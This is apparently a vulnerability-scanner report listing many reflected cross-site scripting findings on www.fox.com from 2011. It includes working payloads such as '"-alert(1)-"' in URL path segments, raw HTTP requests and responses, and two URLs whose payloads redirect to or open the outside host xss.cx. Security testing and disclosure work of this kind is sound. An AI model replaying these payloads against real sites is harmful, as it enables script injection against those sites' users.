The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e264"-alert(1)-"654a85d0bcf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b64c8"-alert(1)-"44a53faa0a1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5520"-alert(1)-"c507a22771b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f71f"-alert(1)-"b7a430e1a5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54d72"-alert(1)-"8631be47365 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6083f"-alert(1)-"36848e2e2e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26b21"-alert(1)-"020a48b7a0a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6c71"-alert(1)-"0a41ec00552 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_uie6c71"-alert(1)-"0a41ec00552/css/combinedcss.php?page=fox.homepage HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.114
Content-Type: text/html; charset=utf-8
Content-Length: 22174
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:02 GMT
Connection: close
Vary: Accept-Encoding
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd487"-alert(1)-"eaa6166238c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_ui/cssdd487"-alert(1)-"eaa6166238c/combinedcss.php?page=fox.homepage HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.115
Content-Type: text/html; charset=utf-8
Content-Length: 22146
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:07 GMT
Connection: close
Vary: Accept-Encoding
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29019"-alert(1)-"b8f967f530a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7b3a"-alert(1)-"eaf96df47c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa8ab"-alert(1)-"8b32fbdd5c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44e20"-alert(1)-"0b1a5a5f8f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edc0e"-alert(1)-"82188488666 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80c7a"-alert(1)-"06df9c9be7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4078"-alert(1)-"68c87225648 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd4ce"-alert(1)-"5577958729 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce750"-alert(1)-"20611a4ed72 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7db3"-alert(1)-"c57217a35f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a97a5"-alert(1)-"52e55e816b9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5720"-alert(1)-"78047514c7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f81b1"-alert(1)-"99f5496527 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60700"-alert(1)-"2d10ecc9658 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6750"-alert(1)-"fe038b27593 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a871"-alert(1)-"e5d9947b15d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 175c3"-alert(1)-"c8766271a5f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87182"-alert(1)-"e3a19d2d90d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0837"-alert(1)-"8f1c4dbff1f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b69c9"-alert(1)-"1ffaeaf684d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82a36"-alert(1)-"8535eeb0e17 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcd22"-alert(1)-"0a8d0234e24 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 483f9"-alert(1)-"f82465dc35c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 211cd"-alert(1)-"d6ea2d832a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26aae"-alert(1)-"ed30504e3ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1654d"-alert(1)-"b5c3130e73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c23ae"-alert(1)-"31104e0facb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bceaf"-alert(1)-"d4d393f6c15 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c78ff"-alert(1)-"da482a500b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb284"-alert(1)-"57851b34756 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ce4b"-alert(1)-"de8cf054805 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2144a"-alert(1)-"3077cfb82ce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17c82"-alert(1)-"2f0bc416e19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18940"-alert(1)-"54fe87175c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1e8b"-alert(1)-"22097ce8d71 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75260"-alert(1)-"dae9b21bf6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7088"-alert(1)-"0abab8d3844 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed381"-alert(1)-"bda88077d1e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d101"-alert(1)-"de22bde193b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66704"-alert(1)-"19baaf36eac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86dee"-alert(1)-"d9f655f316f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86547"-alert(1)-"958c411b368 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bea0a"-alert(1)-"35014117d04 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb0d4"-alert(1)-"3a1020ca558 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17bbd"-alert(1)-"8da2983ce23 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d07de"-alert(1)-"295a0b9dd3b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43757"-alert(1)-"46ed0a637af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.222. http://www.fox.com/_ui/fox_player66704%22-window.location.assign(%22http://xss.cx%22)-%2219baaf36eac/videoXml.php [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48283"-alert(1)-"becba50b315 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70321"-alert(1)-"cac5fde1d79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f56e"-alert(1)-"83cf35fb6ad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb967"-alert(1)-"6467b81c6be was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.226. http://www.fox.com/_ui/fox_player66704%22-window.open(%22http://xss.cx/%22)-%2219baaf36eac/videoXml.php [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7639"-alert(1)-"30c9c963ceb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 226e3"-alert(1)-"ddef4291199 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_ui226e3"-alert(1)-"ddef4291199/js/combinedjs.php?page=tracking HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.116
Content-Type: text/html; charset=utf-8
Content-Length: 22164
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:50 GMT
Connection: close
Vary: Accept-Encoding
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73e68"-alert(1)-"46af491a7a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_ui/js73e68"-alert(1)-"46af491a7a0/combinedjs.php?page=tracking HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.118
Content-Type: text/html; charset=utf-8
Content-Length: 22136
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:55 GMT
Connection: close
Vary: Accept-Encoding
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f36c"-alert(1)-"7498cf41b06 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_ui7f36c"-alert(1)-"7498cf41b06/js/fox_homepage_vars.php?date= HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
